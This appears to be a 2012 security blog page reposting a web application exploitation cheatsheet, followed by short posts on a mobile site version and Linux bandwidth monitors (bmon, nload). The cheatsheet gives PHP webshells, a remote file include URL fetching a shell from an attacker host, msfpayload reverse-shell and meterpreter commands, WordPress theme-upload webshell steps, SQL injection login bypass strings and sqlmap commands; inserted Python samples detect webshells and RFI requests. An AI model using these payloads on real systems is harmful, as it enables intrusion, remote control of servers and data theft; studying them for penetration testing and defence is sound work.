Apr 19, 2012

Web Application Exploitation - a cheatsheet, by Tim Arneaud

If you want to get the full article, please go to the Source.

WebShell Backdoors

Minimal PHP command shells

file cmd.php: PHP script text =>

<?php system($_GET['cmd']) ?>

<?php system($_REQUEST['cmd']); ?>

Example usage via Remote File Include (RFI):

http://<target-ip>/index.php?cmd=<command to execute>&page=http://<attacker-ip>/cmd.php

Null Bytes () may also assist in some cases:
http://<target-ip>/index.php?cmd=<command to execute>&page=http://<attacker-ip>/cmd.php
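As an added example (not part of the cheatsheet), the Python below looks at the two sections above from the defender's side: a source scanner that flags PHP lines passing a request superglobal straight into a shell-execution function, which is the shape of the minimal webshells shown above, and an access-log scanner that flags an include-style parameter carrying a remote URL or an encoded null byte, the RFI request pattern shown above. The PHP snippets, log lines and addresses are constructed samples.

```python
import re
from typing import Dict, List
from urllib.parse import parse_qsl, urlsplit

# PHP request superglobals that carry attacker-controlled input.
PHP_INPUT_SOURCES = r"\$_(?:GET|POST|REQUEST|COOKIE)\b"
# PHP functions that pass a string to the operating system shell.
PHP_EXEC_FUNCTIONS = r"\b(?:system|exec|shell_exec|passthru|popen|proc_open)\b"

# A shell function call whose argument list contains a request superglobal,
# i.e. the shape of system($_GET['cmd']) from the cheatsheet above.
WEBSHELL_RE = re.compile(
    PHP_EXEC_FUNCTIONS + r"\s*\(\s*[^)]*" + PHP_INPUT_SOURCES, re.IGNORECASE
)


def find_webshell_candidates(php_source: str) -> List[str]:
    """Return each source line that hands request input straight to a shell function."""
    return [line.strip() for line in php_source.splitlines() if WEBSHELL_RE.search(line)]


# Combined-log prefix: client, ident, user, [time], "METHOD path proto", status.
ACCESS_LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>[A-Z]+) (?P<path>\S+)[^"]*" (?P<status>\d{3})'
)
REMOTE_SCHEME_RE = re.compile(r"^(?:https?|ftp)://", re.IGNORECASE)


def find_rfi_attempts(log_lines: List[str]) -> List[Dict[str, str]]:
    """Flag requests whose query parameters carry a remote URL or a null byte."""
    hits: List[Dict[str, str]] = []
    for line in log_lines:
        match = ACCESS_LOG_RE.match(line)
        if not match:
            continue  # not a combined-format request line
        query = urlsplit(match.group("path")).query
        for name, value in parse_qsl(query, keep_blank_values=True):
            reasons = []
            if REMOTE_SCHEME_RE.match(value):
                reasons.append("remote-url")
            if "\x00" in value:  # parse_qsl has already decoded %00
                reasons.append("null-byte")
            if reasons:
                hits.append({"ip": match.group("ip"), "status": match.group("status"),
                             "param": name, "reasons": ",".join(reasons)})
    return hits


# Constructed samples: the two shells from the cheatsheet plus two benign scripts.
SAMPLE_PHP_FILES = {
    "cmd.php": "<?php system($_GET['cmd']) ?>",
    "cmd2.php": "<?php system($_REQUEST['cmd']); ?>",
    "hello.php": "<?php echo htmlspecialchars($_GET['name']); ?>",
    "cron.php": "<?php system('ls -l /var/backups'); ?>",
}

# Constructed access-log lines (documentation-range addresses).
SAMPLE_LOG_LINES = [
    '203.0.113.5 - - [19/Apr/2012:10:01:02 +0000] "GET /index.php?page=about HTTP/1.1" 200 512',
    '203.0.113.7 - - [19/Apr/2012:10:01:09 +0000] "GET /index.php?cmd=id&page=http://198.51.100.9/cmd.php HTTP/1.1" 200 88',
    '203.0.113.7 - - [19/Apr/2012:10:01:15 +0000] "GET /index.php?page=http://198.51.100.9/cmd.php%00 HTTP/1.1" 500 0',
]

if __name__ == "__main__":
    for fname, src in SAMPLE_PHP_FILES.items():
        for hit in find_webshell_candidates(src):
            print(f"[webshell?] {fname}: {hit}")
    for hit in find_rfi_attempts(SAMPLE_LOG_LINES):
        print(f"[rfi?] {hit['ip']} param={hit['param']} status={hit['status']} ({hit['reasons']})")
```

The source scanner is deliberately coarse: a hit means "a shell function receives request data somewhere on this line", which is a review queue, not a verdict. The log scanner pairs well with a 5xx filter, since a failed remote include often surfaces as a server error before a successful one does.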

Encoding windows reverse command shell as asp

msfpayload windows/shell_reverse_tcp LHOST=<attacker-ip> LPORT=<attacker-nc-port> R | msfencode -t asp -o <filename>.asp

Encoding meterpreter in asp

msfpayload windows/meterpreter/reverse_tcp LHOST=<attacker-ip> LPORT=<attacker-multi-handler-port> R | msfencode -t asp -o <filename>.asp


attacker msfconsole:

use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set LHOST <attacker-ip>
set LPORT <attacker-multi-handler-port>


Specific Web applications


Joomla default database configuration filename


Scanning Joomla! for plugins and versions

/pentest/web/scanners/joomscan/joomscan.pl -u <target-and-joomla-path>

/pentest/enumeration/web/cms-explorer  -url <target-and-joomla-path> -type joomla


WordPress default database configuration filename

WordPress default login page

WordPress plugins

Scanning WordPress for plugins and versions

/pentest/web/wpscan/wpscan.rb --url <target-and-wordpress-path> --enumerate [u|p|v|t]

/pentest/enumeration/web/cms-explorer -url <target-and-wordpress-path> -type wordpress

Newer WP: "Themes" can be uploaded as zip files by WP administrators:

mkdir wpx

vi wpx/cmd.php

cat wpx/cmd.php

<?php system($_GET['cmd']) ?>

zip -r wpx.zip wpx

upload wpx.zip via web interface as an installed theme

Command execution access is via: 


Older WP: Webshells can be added by editing existing files/themes via the web interface, or by enabling file upload and permitting the required file extension (e.g. .php)


Cacti default database configuration filename


DeV!L`z ClanPortal

DeV!L`z ClanPortal default database configuration filename



Drupal default database configuration filename

Scanning Drupal for plugins and versions

/pentest/enumeration/web/cms-explorer -url <target-and-drupal-path> -type drupal

Timeclock default database configuration filename

SQL Terminators/Comments

<sql injected command>;--


<sql injected command>;#

Login Pages Basic SQL injection 


' OR '1=1';--


'OR 1=1--

SQLMap commands

cd /pentest/database/sqlmap

Retrieve SQL banner, current database and current user; test whether the user is the DB administrator

./sqlmap.py -u "http://<target>/index.php?param1=1&param2=2&param3=3" -p <injectable-parameter> --banner --current-db --current-user --is-dba

Source: http://it-ovid.blogspot.com/2012/04/web-application-exploitation-cheatsheet.html

If you like my blog, Please Donate Me

Apr 18, 2012

My website in mobile version by Dudamobile

I have tried to make my website easy to view on your mobile by using the Dudamobile service, so you can view the mobile version of my site at the URL below.

When you visit my site from your mobile, I have added a script that will redirect you to the mobile version.

URL: http://mobile.dudamobile.com/site/r00tsec_blogspot
Shorten URL: http://bit.ly/J9KOtu


Apr 17, 2012

Monitor your bandwidth from the Linux shell

If you want to see the full article, please go to the source.


bmon is a bandwidth monitor, intended for debugging and real-time monitoring, capable of retrieving statistics from various input modules. It provides several output methods, including a curses-based interface. A set of architecture-specific input modules provide the core with the list of interfaces and their counters.
The core stores these counters and provides rate estimation, including a history over the last 60 seconds, minutes, hours and days, to the output modules, which display them according to the configuration. When running, you can select the interface to monitor and press "g" to see an active graph like this one:


This is an interesting project that lets you display and measure the rate of data across a network connection, or of data being written to a file.
As you can see, although it is a command-line tool, it has vivid colors and other touches that make it quite user-friendly. It can monitor the current download/upload speeds of the network connections, and it can also be used to measure the write speed to a filesystem.
Some of its features are:
  • Change update intervals (default is "1" second).
  • Supports few built-in color depths (1,16-default, 88 and 256), higher numbers mean better quality outputs.
  • Monitors network interfaces (upload & download) and your file system.
  • Can be setup to use plain text rather than graphs.


nload is a console application which monitors network traffic and bandwidth usage in real time. It visualizes the incoming and outgoing traffic using two graphs and provides more information, such as the total amount of transferred data and min/max network usage. This program uses the ncurses libraries, so you'll be able to interact with the mouse in the terminal.
Features of nload
  • Supports all Ethernet interfaces.
  • View the bandwidth with a real-time graph in the shell.
  • Ability to organize the scale, the time to update the graph and the unit of measure.
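Both tools above turn interface byte counters into a displayed rate, and the bmon description spells out the two steps: input modules read the counters, the core estimates rates from them. As an added example that belongs to neither project, the Python below does those two steps over two constructed snapshots in the /proc/net/dev format Linux exposes: it parses the per-interface receive and transmit byte counters, converts the difference into bytes per second while correcting a 32-bit counter wraparound, and formats the result in the binary units such monitors display. The snapshot values and the one-second interval are made up.

```python
from typing import Dict, Tuple

# Assumption for the wraparound correction: 32-bit kernel counters.
COUNTER_WRAP = 2 ** 32

# Two constructed /proc/net/dev snapshots, notionally one second apart (values made up).
SNAPSHOT_T0 = """\
Inter-|   Receive                                                |  Transmit
 face |bytes    packets errs drop fifo frame compressed multicast|bytes    packets errs drop fifo colls carrier compressed
    lo:   12000     100    0    0    0     0          0         0    12000     100    0    0    0     0       0          0
  eth0: 5000000    4000    0    0    0     0          0         0  1000000    2000    0    0    0     0       0          0
"""
SNAPSHOT_T1 = """\
Inter-|   Receive                                                |  Transmit
 face |bytes    packets errs drop fifo frame compressed multicast|bytes    packets errs drop fifo colls carrier compressed
    lo:   12000     100    0    0    0     0          0         0    12000     100    0    0    0     0       0          0
  eth0: 5125000    4100    0    0    0     0          0         0  1012500    2025    0    0    0     0       0          0
"""


def parse_proc_net_dev(text: str) -> Dict[str, Tuple[int, int]]:
    """Return {interface: (rx_bytes, tx_bytes)} from /proc/net/dev text."""
    counters: Dict[str, Tuple[int, int]] = {}
    for line in text.splitlines()[2:]:  # the first two lines are column headers
        if ":" not in line:
            continue
        name, fields = line.split(":", 1)
        values = fields.split()
        # Receive has 8 columns, so transmit bytes is the 9th numeric field.
        counters[name.strip()] = (int(values[0]), int(values[8]))
    return counters


def counter_delta(before: int, after: int) -> int:
    """Difference between two monotonic counter samples, correcting one 32-bit wraparound."""
    delta = after - before
    if delta < 0:
        delta += COUNTER_WRAP
    return delta


def rates(before: Dict[str, Tuple[int, int]], after: Dict[str, Tuple[int, int]],
          interval_s: float) -> Dict[str, Tuple[float, float]]:
    """Bytes per second (rx, tx) for every interface present in both snapshots."""
    result: Dict[str, Tuple[float, float]] = {}
    for iface, (rx0, tx0) in before.items():
        if iface not in after:
            continue  # interface disappeared between the two samples
        rx1, tx1 = after[iface]
        result[iface] = (counter_delta(rx0, rx1) / interval_s,
                         counter_delta(tx0, tx1) / interval_s)
    return result


def format_rate(bytes_per_s: float) -> str:
    """Human-readable rate in the binary units bandwidth monitors display."""
    units = ("B/s", "KiB/s", "MiB/s", "GiB/s")
    value = float(bytes_per_s)
    index = 0
    while value >= 1024 and index < len(units) - 1:
        value /= 1024
        index += 1
    return f"{value:.2f} {units[index]}"


if __name__ == "__main__":
    current = rates(parse_proc_net_dev(SNAPSHOT_T0), parse_proc_net_dev(SNAPSHOT_T1), 1.0)
    for iface, (rx, tx) in sorted(current.items()):
        print(f"{iface:>6}  RX {format_rate(rx):>14}  TX {format_rate(tx):>14}")
```

A real monitor would read the file on each tick and keep a ring of recent rates for the history the bmon description mentions; the wraparound check matters on such long-running loops, where a counter that rolls over would otherwise show up as a huge negative rate.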

Source: http://linuxaria.com/article/monitor-your-bandwidth-from-the-linux-shell
